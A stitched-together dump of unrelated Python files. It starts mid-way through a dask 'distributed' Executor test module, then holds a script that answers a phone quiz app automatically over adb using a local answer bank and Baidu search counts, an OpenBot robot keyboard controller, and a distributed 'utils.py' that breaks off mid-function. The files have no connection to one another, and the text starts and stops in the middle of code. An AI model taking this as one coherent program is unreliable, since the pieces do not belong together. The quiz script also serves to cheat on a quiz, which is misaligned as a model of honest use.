s.waiting_data[y.key] assert set(s.tasks) == {x.key, y.key, z.key} s.client_releases_keys(keys=[x.key], client=e.id) assert x.key in s.tasks s.client_releases_keys(keys=[z.key], client=e.id) for coll in [s.tasks, s.dependencies, s.dependents, s.waiting, s.waiting_data, s.who_has, s.restrictions, s.loose_restrictions, s.in_play, s.keyorder, s.exceptions, s.who_wants, s.exceptions_blame]: assert x.key not in coll assert z.key not in coll assert z.key not in s.dependents[y.key] s.client_releases_keys(keys=[y.key], client=e.id) assert not s.tasks yield e._shutdown() @gen_cluster() def test_forget_complex(s, A, B): e = Executor((s.ip, s.port), start=False) yield e._start() a, b, c, d = yield e._scatter(list(range(4))) ab = e.submit(add, a, b) cd = e.submit(add, c, d) ac = e.submit(add, a, c) acab = e.submit(add, ac, ab) yield _wait([a,b,c,d,ab,ac,cd,acab]) assert set(s.tasks) == {f.key for f in [ab,ac,cd,acab]} s.client_releases_keys(keys=[ab.key], client=e.id) assert set(s.tasks) == {f.key for f in [ab,ac,cd,acab]} s.client_releases_keys(keys=[b.key], client=e.id) assert set(s.tasks) == {f.key for f in [ab,ac,cd,acab]} s.client_releases_keys(keys=[acab.key], client=e.id) assert set(s.tasks) == {f.key for f in [ac,cd]} assert b.key not in s.who_has start = time() while b.key in A.data or b.key in B.data: yield gen.sleep(0.01) assert time() < start + 10 s.client_releases_keys(keys=[ac.key], client=e.id) assert set(s.tasks) == {f.key for f in [cd]} yield e._shutdown() def test_repr_sync(loop): with cluster(nworkers=3) as (s, [a, b, c]): with Executor(('127.0.0.1', s['port']), loop=loop) as e: s = str(e) r = repr(e) assert e.scheduler.ip in s assert str(e.scheduler.port) in r assert str(3) in s # nworkers assert 'threads' in s @gen_cluster() def test_waiting_data(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() x = e.submit(inc, 1) y = e.submit(inc, 2) z = e.submit(add, x, y, workers=[a.ip], allow_other_workers=True) yield _wait([x, y, z]) assert x.key not in s.waiting_data[x.key] assert y.key not in s.waiting_data[y.key] assert not s.waiting_data[x.key] assert not s.waiting_data[y.key] yield e._shutdown() @gen_cluster() def test_multi_executor(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() f = Executor((s.ip, s.port), start=False) yield f._start() assert set(s.streams) == {e.id, f.id} x = e.submit(inc, 1) y = f.submit(inc, 2) y2 = e.submit(inc, 2) assert y.key == y2.key yield _wait([x, y]) assert s.wants_what == {e.id: {x.key, y.key}, f.id: {y.key}} assert s.who_wants == {x.key: {e.id}, y.key: {e.id, f.id}} yield e._shutdown() start = time() while e.id in s.wants_what: yield gen.sleep(0.01) assert time() < start + 5 assert e.id not in s.wants_what assert e.id not in s.who_wants[y.key] assert x.key not in s.who_wants yield f._shutdown() assert not s.tasks @gen_cluster() def test_cleanup_after_broken_executor_connection(s, a, b): def f(ip, port): e = Executor((ip, port)) x = e.submit(lambda x: x + 1, 10) x.result() sleep(100) proc = Process(target=f, args=(s.ip, s.port)) proc.daemon = True proc.start() start = time() while not s.tasks: yield gen.sleep(0.01) assert time() < start + 5 proc.terminate() start = time() while s.tasks: yield gen.sleep(0.01) assert time() < start + 5 @gen_cluster() def test_multi_garbage_collection(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() f = Executor((s.ip, s.port), start=False) yield f._start() x = e.submit(inc, 1) y = f.submit(inc, 2) y2 = e.submit(inc, 2) assert y.key == y2.key yield _wait([x, y]) x.__del__() start = time() while x.key in a.data or x.key in b.data: yield gen.sleep(0.01) assert time() < start + 5 assert s.wants_what == {e.id: {y.key}, f.id: {y.key}} assert s.who_wants == {y.key: {e.id, f.id}} y.__del__() start = time() while x.key in s.wants_what[f.id]: yield gen.sleep(0.01) assert time() < start + 5 yield gen.sleep(0.1) assert y.key in a.data or y.key in b.data assert s.wants_what == {e.id: {y.key}, f.id: set()} assert s.who_wants == {y.key: {e.id}} y2.__del__() start = time() while y.key in a.data or y.key in b.data: yield gen.sleep(0.01) assert time() < start + 5 assert not any(v for v in s.wants_what.values()) assert not s.who_wants yield e._shutdown() yield f._shutdown() @gen_cluster() def test__broadcast(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() x, y = yield e._scatter([1, 2], broadcast=True) assert a.data == b.data == {x.key: 1, y.key: 2} yield e._shutdown() def test_broadcast(loop): with cluster() as (s, [a, b]): with Executor(('127.0.0.1', s['port']), loop=loop) as e: x, y = e.scatter([1, 2], broadcast=True) has_what = sync(e.loop, e.scheduler.has_what) assert has_what == {('127.0.0.1', a['port']): {x.key, y.key}, ('127.0.0.1', b['port']): {x.key, y.key}} [z] = e.scatter([3], broadcast=True, workers=[('127.0.0.1', a['port'])]) has_what = sync(e.loop, e.scheduler.has_what) assert has_what == {('127.0.0.1', a['port']): {x.key, y.key, z.key}, ('127.0.0.1', b['port']): {x.key, y.key}} @gen_cluster() def test__cancel(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() x = e.submit(slowinc, 1) y = e.submit(slowinc, x) while y.key not in s.tasks: yield gen.sleep(0.01) yield e._cancel([x], block=True) assert x.cancelled() assert 'cancel' in str(x) s.validate() start = time() while not y.cancelled(): yield gen.sleep(0.01) assert time() < start + 5 assert not s.tasks s.validate() yield e._shutdown() @gen_cluster() def test__cancel_multi_client(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() f = Executor((s.ip, s.port), start=False) yield f._start() x = e.submit(slowinc, 1) y = f.submit(slowinc, 1) assert x.key == y.key yield e._cancel([x], block=True) assert x.cancelled() assert not y.cancelled() assert y.key in s.tasks out = yield y._result() assert out == 2 with pytest.raises(CancelledError): yield x._result() yield e._shutdown() yield f._shutdown() @gen_cluster() def test__cancel_collection(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() import dask.bag as db L = e.map(double, [[1], [2], [3]]) x = db.Bag({('b', i): f for i, f in enumerate(L)}, 'b', 3) yield e._cancel(x) yield e._cancel([x]) assert all(f.cancelled() for f in L) assert not s.tasks yield e._shutdown() def test_cancel(loop): with cluster() as (s, [a, b]): with Executor(('127.0.0.1', s['port']), loop=loop) as e: x = e.submit(slowinc, 1) y = e.submit(slowinc, x) z = e.submit(slowinc, y) e.cancel([y], block=True) start = time() while not z.cancelled(): sleep(0.01) assert time() < start + 5 assert x.result() == 2 z.cancel(block=True) assert z.cancelled() @gen_cluster() def test_future_type(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() x = e.submit(inc, 1) yield _wait([x]) assert x.type == int assert 'int' in str(x) yield e._shutdown() @gen_cluster() def test_traceback_clean(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() x = e.submit(div, 1, 0) try: yield x._result() except Exception as e: f = e exc_type, exc_value, tb = sys.exc_info() while tb: assert 'scheduler' not in tb.tb_frame.f_code.co_filename assert 'worker' not in tb.tb_frame.f_code.co_filename tb = tb.tb_next @gen_cluster() def test_map_queue(s, a, b): from distributed.compatibility import Queue, isqueue e = Executor((s.ip, s.port), start=False) yield e._start() q_1 = Queue(maxsize=2) q_2 = e.map(inc, q_1) assert isqueue(q_2) q_3 = e.map(double, q_2) assert isqueue(q_3) q_4 = yield e._gather(q_3) assert isqueue(q_4) q_1.put(1) f = q_4.get() assert isinstance(f, Future) result = yield f._result() assert result == (1 + 1) * 2 yield e._shutdown() @gen_cluster() def test_map_iterator(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() x = iter([1, 2, 3]) y = iter([10, 20, 30]) f1 = e.map(add, x, y) assert isinstance(f1, Iterator) start = time() # ensure that we compute eagerly while not s.tasks: yield gen.sleep(0.01) assert time() < start + 5 f2 = e.map(double, f1) assert isinstance(f2, Iterator) future = next(f2) result = yield future._result() assert result == (1 + 10) * 2 yield e._shutdown() @gen_cluster() def test_map_infinite_iterators(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() futures = e.map(add, [1, 2], itertools.repeat(10)) assert len(futures) == 2 @gen_cluster() def test_map_differnet_lengths(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() assert len(e.map(add, [1, 2], [1, 2, 3])) == 2 def test_Future_exception_sync(loop, capsys): with cluster() as (s, [a, b]): with Executor(('127.0.0.1', s['port']), loop=loop) as e: ensure_default_get(e) ensure_default_get(e) ensure_default_get(e) ensure_default_get(e) out, err = capsys.readouterr() assert len(out.strip().split('\n')) == 1 assert _globals['get'] == e.get @gen_cluster(timeout=1000) def test_async_persist(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() from dask.imperative import do, value, Value x = value(1) y = do(inc)(x) z = do(dec)(x) w = do(add)(y, z) yy, ww = e.persist([y, w]) assert type(yy) == type(y) assert type(ww) == type(w) assert len(yy.dask) == 1 assert len(ww.dask) == 1 assert len(w.dask) > 1 assert y._keys() == yy._keys() assert w._keys() == ww._keys() while y.key not in s.tasks and w.key not in s.tasks: yield gen.sleep(0.01) assert s.who_wants[y.key] == {e.id} assert s.who_wants[w.key] == {e.id} yyf, wwf = e.compute([yy, ww]) yyy, www = yield e._gather([yyf, wwf]) assert yyy == inc(1) assert www == add(inc(1), dec(1)) assert isinstance(e.persist(y), Value) assert isinstance(e.persist([y]), (list, tuple)) yield e._shutdown() def test_persist(loop): pytest.importorskip('dask.array') import dask.array as da with cluster() as (s, [a, b]): with Executor(('127.0.0.1', s['port']), loop=loop) as e: x = da.ones((10, 10), chunks=(5, 10)) y = 2 * (x + 1) assert len(y.dask) == 6 yy = e.persist(y) assert len(y.dask) == 6 assert len(yy.dask) == 2 assert all(isinstance(v, Future) for v in yy.dask.values()) assert (yy.compute(get=e.get) == y.compute(get=e.get)).all() @gen_cluster(timeout=60) def test_long_traceback(s, a, b): from distributed.core import dumps e = Executor((s.ip, s.port), start=False) yield e._start() n = sys.getrecursionlimit() sys.setrecursionlimit(500) try: x = e.submit(deep, 1000) yield _wait([x]) assert len(dumps(e.futures[x.key]['traceback'])) < 10000 assert isinstance(e.futures[x.key]['exception'], RuntimeError) finally: sys.setrecursionlimit(n) yield e._shutdown() @gen_cluster() def test_wait_on_collections(s, a, b): e = Executor((s.ip, s.port), start=False) yield e._start() import dask.bag as db L = e.map(double, [[1], [2], [3]]) x = db.Bag({('b', i): f for i, f in enumerate(L)}, 'b', 3) yield _wait(x) assert all(f.key in a.data or f.key in b.data for f in L) yield e._shutdown() def test_futures_of(): x, y, z = map(WrappedKey, 'xyz') assert futures_of(0) == [] assert futures_of(x) == [x] assert futures_of([x, y, z]) == [x, y, z] assert futures_of([x, [y], [[z]]]) == [x, y, z] import dask.bag as db b = db.Bag({('b', i): f for i, f in enumerate([x, y, z])}, 'b', 3) assert set(futures_of(b)) == {x, y, z} @gen_cluster(ncores=[('127.0.0.1', 1)]) def test_dont_delete_recomputed_results(s, w): e = Executor((s.ip, s.port), start=False) yield e._start() x = e.submit(inc, 1) # compute first time yield _wait([x]) x.__del__() # trigger garbage collection xx = e.submit(inc, 1) # compute second time start = time() while xx.key not in w.data: # data shows up yield gen.sleep(0.01) assert time() < start + 1 while time() < start + (s.delete_interval + 100) / 1000: # and stays assert xx.key in w.data yield gen.sleep(0.01) yield e._shutdown() @gen_cluster(ncores=[]) def test_fatally_serialized_input(s): e = Executor((s.ip, s.port), start=False) yield e._start() o = FatallySerializedObject() future = e.submit(inc, o) while not s.tasks: yield gen.sleep(0.01) yield e._shutdown()
main.py
#!/usr/bin/env python # -*- coding:utf-8 -*- ''' @file: main.py @author: kessil @contact: https://github.com/kessil/ @time: 2019年06月02日 15:58:23 @desc: Life is short, you need Python ''' from time import sleep from adble import pull_xml, tap_screen from model import Base, engine, Session,Bank, db_add, db_qeury import requests import string from urllib.parse import quote from config import Config import re from playsound import playsound import threading from random import randint filename = Config.XML_URI question = None Base.metadata.create_all(engine) session = Session() def attention(filename='attention.mp3', repeat=Config.REPEAT_TIMES): '''语音提示:https://developer.baidu.com/vcast导出音频''' for i in range(repeat): playsound('./sounds/%s'%filename) def search(question): '''搜索引擎检索题目''' content = re.sub(r'[\((]出题单位.*', "", question.content) url = quote('https://www.baidu.com/s?wd=' + content, safe=string.printable) headers = Config.HEADERS response = requests.get(url, headers=headers).text if question.item1: print('A. %s: %d'%(question.item1, response.count(question.item1))) if question.item2: print('B. %s: %d'%(question.item2, response.count(question.item2))) if question.item3: print('C. %s: %d'%(question.item3, response.count(question.item3))) if question.item4: print('D. %s: %d'%(question.item4, response.count(question.item4))) print('%s\n请先在手机提交答案,根据提交结果输入答案!'%('-'*min(len(question.content)*2, 120))) def run(session, num=float('inf')): # t= threading.Thread(target=attention)#创建线程 # t.setDaemon(True)#设置为后台线程,这里默认是False,设置为True之后则主线程不用等待子线程 while num: num = num - 1 pull_xml(filename) sleep(1) question = Bank.from_xml(filename) print('\n%s\n%s'%('-'*min(len(question.content)*2, 120), question.content)) bank = db_qeury(session, content=question.content) delay = 1 # randint(3,5) if bank: index = ord(bank.answer)-65 pos = complex(question.bounds.split(' ')[index]) if question.item1: print('A. %s'%question.item1) if question.item2: print('B. %s'%question.item2) if question.item3: print('C. %s'%question.item3) if question.item4: print('D. %s'%question.item4) print(f"\n {delay} 秒自动提交答案: {bank.answer}\n") if 0j == pos: t= threading.Thread(target=attention, args=('crossed.mp3',1))#创建线程 t.start() sleep(5) continue else: sleep(delay) tap_screen(int(pos.real), int(pos.imag)) else: t= threading.Thread(target=attention, args=('doubt.mp3',2))#创建线程 t.start() search(question) ch = input('请输入:').upper() if ch and 'N' == ch: break if ch and ch in "ABCD": question.answer = ch db_add(session, question) if __name__ == "__main__": run(session,842)
keyboard-pygame.py
import pygame from pygame.locals import * import cv2 # pip3 install opencv-python import os import threading import json from common import * import argparse s_socket = ServerSocket() white = (255, 255, 255) black = (0, 0, 0) blue = (0, 0, 128) red = (200, 0, 0) class CommandHandler: def __init__(self): pygame.key.set_repeat(200) left = DriveValue() right = DriveValue() def send_command(self, command): s_socket.send('{{command: {command} }}\n'.format(command=command)) def send_drive_command(self, left, right): s_socket.send('{{driveCmd: {{l:{l}, r:{r} }} }}\n'.format(l=left, r=right)) def reset(self): self.send_drive_command(self.left.reset(), self.right.reset()) def forward_left(self): self.send_drive_command(self.left.write(0.75), self.right.max()) def forward_right(self): self.send_drive_command(self.left.max(), self.right.write(0.75)) def backward_left(self): self.send_drive_command(self.left.min(), self.right.write(-0.75)) def backward_right(self): self.send_drive_command(self.left.write(-0.75), self.right.min()) def rotate_left(self): self.send_drive_command(self.left.min(), self.right.max()) def rotate_right(self): self.send_drive_command(self.left.max(), self.right.min()) def go_forward(self): self.send_drive_command(self.left.max(), self.right.max()) def go_backward(self): self.send_drive_command(self.left.min(), self.right.min()) def handle_keys(self): while True: for event in pygame.event.get(): if event.type == pygame.QUIT: running = False if event.type == pygame.KEYUP: if event.key==K_w: self.reset() elif event.key in [K_a, K_d, K_q, K_e]: if(pygame.key.get_pressed()[pygame.K_w]): self.go_forward() elif(pygame.key.get_pressed()[pygame.K_s]): self.go_backward() else: self.reset() elif event.key==K_s: self.reset() if event.type == pygame.KEYDOWN: if event.key==K_w: self.go_forward() elif event.key==K_s: self.go_backward() elif event.key==K_a: if(pygame.key.get_pressed()[pygame.K_w]): self.forward_left() elif(pygame.key.get_pressed()[pygame.K_s]): self.backward_left() elif event.key==K_d: if(pygame.key.get_pressed()[pygame.K_w]): self.forward_right() elif(pygame.key.get_pressed()[pygame.K_s]): self.backward_right() elif event.key==K_q: self.rotate_left() elif event.key==K_e: self.rotate_right() if event.key==pygame.K_n: self.send_command("NOISE") if event.key==pygame.K_SPACE: self.send_command("LOGS") if event.key==pygame.K_RIGHT: self.send_command("INDICATOR_RIGHT") if event.key==pygame.K_LEFT: self.send_command("INDICATOR_LEFT") if event.key==pygame.K_UP: self.send_command("INDICATOR_STOP") if event.key==pygame.K_DOWN: self.send_command("NETWORK") if event.key==pygame.K_m: self.send_command("DRIVE_MODE") if event.key==pygame.K_ESCAPE: return (zc, info) = register("OPEN_BOT_CONTROLLER", 19400) class VideoPlayer: def set_stream (self, stream): self.stream = stream def play_video(self): if not self.stream: print(f'Sream not set') return print(f'Opening the stream...') cap = cv2.VideoCapture(self.stream) # read one frame and check if there was no problem print(f'Checking the stream...') ret, img = cap.read() if not ret: print("Can't read stream") cap.release() cv2.destroyAllWindows() return img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB) #img = cv2.flip(img, 1) img = cv2.transpose(img) # display its width, height, color_depth print('Stream resolution:', img.shape) shape = img.shape width = img.shape[0] height = img.shape[1] display_flags = DOUBLEBUF | HWSURFACE # | SCALED if pygame.display.mode_ok(size=(width, height), flags=display_flags ): video_screen = pygame.display.set_mode(size=(width, height), flags=display_flags) else: raise ValueError("error initializing display, can not get mode") print (f'Display: {pygame.display.Info()}') running = True while running: # read one frame and check if there was no problem ret, img = cap.read() if not ret: running = False cap.release() cv2.destroyAllWindows() break else: img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB) img = cv2.transpose(img) # blit directly on screen pygame.surfarray.blit_array(video_screen, img) pygame.display.flip() def stop_video(self): print(f'Stopping video...') pass def usage(): usageStr = """ Make sure to keep the pygame window in focus!\r Use the following keys to drive the robot:\r \tW: Go forward\r \tS: Go backward\r \tA: Turn slightly left (while driving)\r \tD: Turn slightly right (while driving)\r \tQ: Rotate left\r \tE: Rotate right\r \tM: Drive mode\r \tN: Toggle noise\r \tLeft: Left indicator\r \tRight: Right indicator\r \tUp: Cancel indicators\r \tDown: Network mode\r \tSPACE: Toggle logging\r \tESC: Quit\r """ return usageStr def run_receiver (): while True: try: data = s_socket.receive() print(f'Received: {data}\r') if data in ["", None]: return handle_status(data) except Exception as e: print(f'run_receiver: Got exception: {e}\r') break video_player = VideoPlayer() def handle_status(data): parsed_data = json.loads(data) if not 'status' in parsed_data: return status = parsed_data['status'] try: if 'VIDEO_SERVER_URL' in status: stream = status ['VIDEO_SERVER_URL'] video_player.set_stream(stream) if 'VIDEO_COMMAND' in status: if status['VIDEO_COMMAND'] == 'START': print(f'Starting video...') video_player.play_video() if status['VIDEO_COMMAND'] == 'STOP': video_player.stop_video() except Exception as e: print (f"handle_status exception: {e}") def setup_screen (): pygame.display.set_caption('OpenBot keyboard controller') font = pygame.font.Font(None, 32) #Use system font screen = pygame.display.set_mode([1280, 720]) screen.fill(white) text = usage() print(text) lines = text.strip().split('\r') x_pos = 50 y_pos = 50 delimiter=':' for line in lines: # create a text suface object if delimiter in line: space = ' ' if '\t' in line else '' elements = line.strip().split(delimiter) text = font.render(space + elements[0].strip() + delimiter, True, blue) screen.blit(text, (x_pos, y_pos)) text = font.render(elements[1].strip(), True, black) screen.blit(text, (x_pos+200, y_pos)) else: text = font.render(line, True, red) screen.blit(text, (x_pos, y_pos)) pygame.display.update() y_pos=y_pos+40 def run(args): os.environ["OPENCV_FFMPEG_CAPTURE_OPTIONS"] = "rtsp_transport;udp" print('Waiting for connection...\r\n') s_socket.accept() print('Connected! 😃\n\r') pygame.init() setup_screen() if (args.video): t = threading.Thread(target=run_receiver) t.start() cmd_handler = CommandHandler () cmd_handler.handle_keys () s_socket.close() zc.unregister_service(info) zc.close() print('Exiting...\r\n') if __name__ == "__main__": # cli parser = argparse.ArgumentParser() parser.add_argument("-v", "--video", action="store_true", help="video stream") args = parser.parse_args() run (args)
utils.py
import asyncio from asyncio import TimeoutError import atexit import click from collections import deque, OrderedDict, UserDict from concurrent.futures import ThreadPoolExecutor, CancelledError # noqa: F401 from contextlib import contextmanager, suppress import functools from hashlib import md5 import html import json import logging import multiprocessing import os import re import shutil import socket from time import sleep import importlib from importlib.util import cache_from_source import inspect import sys import tempfile import threading import warnings import weakref import pkgutil import base64 import tblib.pickling_support import xml.etree.ElementTree try: import resource except ImportError: resource = None import dask from dask import istask # provide format_bytes here for backwards compatibility from dask.utils import ( # noqa format_bytes, funcname, format_time, parse_bytes, parse_timedelta, ) import tlz as toolz from tornado import gen from tornado.ioloop import IOLoop try: from tornado.ioloop import PollIOLoop except ImportError: PollIOLoop = None # dropped in tornado 6.0 from .compatibility import PYPY, WINDOWS, get_running_loop from .metrics import time try: from dask.context import thread_state except ImportError: thread_state = threading.local() # For some reason this is required in python >= 3.9 if WINDOWS: import multiprocessing.popen_spawn_win32 else: import multiprocessing.popen_spawn_posix logger = _logger = logging.getLogger(__name__) no_default = "__no_default__" def _initialize_mp_context(): if WINDOWS or PYPY: return multiprocessing else: method = dask.config.get("distributed.worker.multiprocessing-method") ctx = multiprocessing.get_context(method) # Makes the test suite much faster preload = ["distributed"] if "pkg_resources" in sys.modules: preload.append("pkg_resources") from .versions import required_packages, optional_packages for pkg, _ in required_packages + optional_packages: try: importlib.import_module(pkg) except ImportError: pass else: preload.append(pkg) ctx.set_forkserver_preload(preload) return ctx mp_context = _initialize_mp_context() def has_arg(func, argname): """ Whether the function takes an argument with the given name. """ while True: try: if argname in inspect.getfullargspec(func).args: return True except TypeError: break try: # For Tornado coroutines and other decorated functions func = func.__wrapped__ except AttributeError: break return False def get_fileno_limit(): """ Get the maximum number of open files per process. """ if resource is not None: return resource.getrlimit(resource.RLIMIT_NOFILE)[0] else: # Default ceiling for Windows when using the CRT, though it # is settable using _setmaxstdio(). return 512 @toolz.memoize def _get_ip(host, port, family): # By using a UDP socket, we don't actually try to connect but # simply select the local address through which *host* is reachable. sock = socket.socket(family, socket.SOCK_DGRAM) try: sock.connect((host, port)) ip = sock.getsockname()[0] return ip except EnvironmentError as e: warnings.warn( "Couldn't detect a suitable IP address for " "reaching %r, defaulting to hostname: %s" % (host, e), RuntimeWarning, ) addr_info = socket.getaddrinfo( socket.gethostname(), port, family, socket.SOCK_DGRAM, socket.IPPROTO_UDP )[0] return addr_info[4][0] finally: sock.close() def get_ip(host="8.8.8.8", port=80): """ Get the local IP address through which the *host* is reachable. *host* defaults to a well-known Internet host (one of Google's public DNS servers). """ return _get_ip(host, port, family=socket.AF_INET) def get_ipv6(host="2001:4860:4860::8888", port=80): """ The same as get_ip(), but for IPv6. """ return _get_ip(host, port, family=socket.AF_INET6) def get_ip_interface(ifname): """ Get the local IPv4 address of a network interface. KeyError is raised if the interface doesn't exist. ValueError is raised if the interface does no have an IPv4 address associated with it. """ import psutil net_if_addrs = psutil.net_if_addrs() if ifname not in net_if_addrs: allowed_ifnames = list(net_if_addrs.keys()) raise ValueError( "{!r} is not a valid network interface. " "Valid network interfaces are: {}".format(ifname, allowed_ifnames) ) for info in net_if_addrs[ifname]: if info.family == socket.AF_INET: return info.address raise ValueError("interface %r doesn't have an IPv4 address" % (ifname,)) # FIXME: this breaks if changed to async def... @gen.coroutine def ignore_exceptions(coroutines, *exceptions): """Process list of coroutines, ignoring certain exceptions >>> coroutines = [cor(...) for ...] # doctest: +SKIP >>> x = yield ignore_exceptions(coroutines, TypeError) # doctest: +SKIP """ wait_iterator = gen.WaitIterator(*coroutines) results = [] while not wait_iterator.done(): with suppress(*exceptions): result = yield wait_iterator.next() results.append(result) raise gen.Return(results) async def All(args, quiet_exceptions=()): """Wait on many tasks at the same time Err once any of the tasks err. See https://github.com/tornadoweb/tornado/issues/1546 Parameters ---------- args: futures to wait for quiet_exceptions: tuple, Exception Exception types to avoid logging if they fail """ tasks = gen.WaitIterator(*map(asyncio.ensure_future, args)) results = [None for _ in args] while not tasks.done(): try: result = await tasks.next() except Exception: @gen.coroutine def quiet(): """Watch unfinished tasks Otherwise if they err they get logged in a way that is hard to control. They need some other task to watch them so that they are not orphaned """ for task in list(tasks._unfinished): try: yield task except quiet_exceptions: pass quiet() raise results[tasks.current_index] = result return results async def Any(args, quiet_exceptions=()): """Wait on many tasks at the same time and return when any is finished Err once any of the tasks err. Parameters ---------- args: futures to wait for quiet_exceptions: tuple, Exception Exception types to avoid logging if they fail """ tasks = gen.WaitIterator(*map(asyncio.ensure_future, args)) results = [None for _ in args] while not tasks.done(): try: result = await tasks.next() except Exception: @gen.coroutine def quiet(): """Watch unfinished tasks Otherwise if they err they get logged in a way that is hard to control. They need some other task to watch them so that they are not orphaned """ for task in list(tasks._unfinished): try: yield task except quiet_exceptions: pass quiet() raise results[tasks.current_index] = result break return results def sync(loop, func, *args, callback_timeout=None, **kwargs): """ Run coroutine in loop running in separate thread. """ callback_timeout = parse_timedelta(callback_timeout, "s") # Tornado's PollIOLoop doesn't raise when using closed, do it ourselves if PollIOLoop and ( (isinstance(loop, PollIOLoop) and getattr(loop, "_closing", False)) or (hasattr(loop, "asyncio_loop") and loop.asyncio_loop._closed) ): raise RuntimeError("IOLoop is closed") try: if loop.asyncio_loop.is_closed(): # tornado 6 raise RuntimeError("IOLoop is closed") except AttributeError: pass e = threading.Event() main_tid = threading.get_ident() result = [None] error = [False] @gen.coroutine def f(): # We flag the thread state asynchronous, which will make sync() call # within `func` use async semantic. In order to support concurrent # calls to sync(), `asynchronous` is used as a ref counter. thread_state.asynchronous = getattr(thread_state, "asynchronous", 0) thread_state.asynchronous += 1 try: if main_tid == threading.get_ident(): raise RuntimeError("sync() called from thread of running loop") yield gen.moment future = func(*args, **kwargs) if callback_timeout is not None: future = asyncio.wait_for(future, callback_timeout) result[0] = yield future except Exception as exc: error[0] = sys.exc_info() finally: assert thread_state.asynchronous > 0 thread_state.asynchronous -= 1 e.set() loop.add_callback(f) if callback_timeout is not None: if not e.wait(callback_timeout): raise TimeoutError("timed out after %s s." % (callback_timeout,)) else: while not e.is_set(): e.wait(10) if error[0]: typ, exc, tb = error[0] raise exc.with_traceback(tb) else: return result[0] class LoopRunner: """ A helper to start and stop an IO loop in a controlled way. Several loop runners can associate safely to the same IO loop. Parameters ---------- loop: IOLoop (optional) If given, this loop will be re-used, otherwise an appropriate one will be looked up or created. asynchronous: boolean (optional, default False) If false (the default), the loop is meant to run in a separate thread and will be started if necessary. If true, the loop is meant to run in the thread this object is instantiated from, and will not be started automatically. """ # All loops currently associated to loop runners _all_loops = weakref.WeakKeyDictionary() _lock = threading.Lock() def __init__(self, loop=None, asynchronous=False): current = IOLoop.current() if loop is None: if asynchronous: self._loop = current else: # We're expecting the loop to run in another thread, # avoid re-using this thread's assigned loop self._loop = IOLoop() else: self._loop = loop self._asynchronous = asynchronous self._loop_thread = None self._started = False with self._lock: self._all_loops.setdefault(self._loop, (0, None)) def start(self): """ Start the IO loop if required. The loop is run in a dedicated thread. If the loop is already running, this method does nothing. """ with self._lock: self._start_unlocked() def _start_unlocked(self): assert not self._started count, real_runner = self._all_loops[self._loop] if self._asynchronous or real_runner is not None or count > 0: self._all_loops[self._loop] = count + 1, real_runner self._started = True return assert self._loop_thread is None assert count == 0 loop_evt = threading.Event() done_evt = threading.Event() in_thread = [None] start_exc = [None] def loop_cb(): in_thread[0] = threading.current_thread() loop_evt.set() def run_loop(loop=self._loop): loop.add_callback(loop_cb) try: loop.start() except Exception as e: start_exc[0] = e finally: done_evt.set() thread = threading.Thread(target=run_loop, name="IO loop") thread.daemon = True thread.start() loop_evt.wait(timeout=10) self._started = True actual_thread = in_thread[0] if actual_thread is not thread: # Loop already running in other thread (user-launched) done_evt.wait(5) if not isinstance(start_exc[0], RuntimeError): if not isinstance( start_exc[0], Exception ): # track down infrequent error raise TypeError("not an exception", start_exc[0]) raise start_exc[0] self._all_loops[self._loop] = count + 1, None else: assert start_exc[0] is None, start_exc self._loop_thread = thread self._all_loops[self._loop] = count + 1, self def stop(self, timeout=10): """ Stop and close the loop if it was created by us. Otherwise, just mark this object "stopped". """ with self._lock: self._stop_unlocked(timeout) def _stop_unlocked(self, timeout): if not self._started: return self._started = False count, real_runner = self._all_loops[self._loop] if count > 1: self._all_loops[self._loop] = count - 1, real_runner else: assert count == 1 del self._all_loops[self._loop] if real_runner is not None: real_runner._real_stop(timeout) def _real_stop(self, timeout): assert self._loop_thread is not None if self._loop_thread is not None: try: self._loop.add_callback(self._loop.stop) self._loop_thread.join(timeout=timeout) with suppress(KeyError): # IOLoop can be missing self._loop.close() finally: self._loop_thread = None def is_started(self): """ Return True between start() and stop() calls, False otherwise. """ return self._started def run_sync(self, func, *args, **kwargs): """ Convenience helper: start the loop if needed, run sync(func, *args, **kwargs), then stop the loop again. """ if self._started: return sync(self.loop, func, *args, **kwargs) else: self.start() try: return sync(self.loop, func, *args, **kwargs) finally: self.stop() @property def loop(self): return self._loop @contextmanager def set_thread_state(**kwargs): old = {} for k in kwargs: try: old[k] = getattr(thread_state, k) except AttributeError: pass for k, v in kwargs.items(): setattr(thread_state, k, v) try: yield finally: for k in kwargs: try: v = old[k] except KeyError: delattr(thread_state, k) else: setattr(thread_state, k, v) @contextmanager def tmp_text(filename, text): fn = os.path.join(tempfile.gettempdir(), filename) with open(fn, "w") as f: f.write(text) try: yield fn finally: if os.path.exists(fn): os.remove(fn) def clear_queue(q): while not q.empty(): q.get_nowait() def is_kernel(): """Determine if we're running within an IPython kernel >>> is_kernel() False """ # http://stackoverflow.com/questions/34091701/determine-if-were-in-an-ipython-notebook-session if "IPython" not in sys.modules: # IPython hasn't been imported return False from IPython import get_ipython # check for `kernel` attribute on the IPython instance return getattr(get_ipython(), "kernel", None) is not None hex_pattern = re.compile("[a-f]+") @functools.lru_cache(100000) def key_split(s): """ >>> key_split('x') 'x' >>> key_split('x-1') 'x' >>> key_split('x-1-2-3') 'x' >>> key_split(('x-2', 1)) 'x' >>> key_split("('x-2', 1)") 'x' >>> key_split("('x', 1)") 'x' >>> key_split('hello-world-1') 'hello-world' >>> key_split(b'hello-world-1') 'hello-world' >>> key_split('ae05086432ca935f6eba409a8ecd4896') 'data' >>> key_split('<module.submodule.myclass object at 0xdaf372') 'myclass' >>> key_split(None) 'Other' >>> key_split('x-abcdefab') # ignores hex 'x' """ if type(s) is bytes: s = s.decode() if type(s) is tuple: s = s[0] try: words = s.split("-") if not words[0][0].isalpha(): result = words[0].split(",")[0].strip("'(\"") else: result = words[0] for word in words[1:]: if 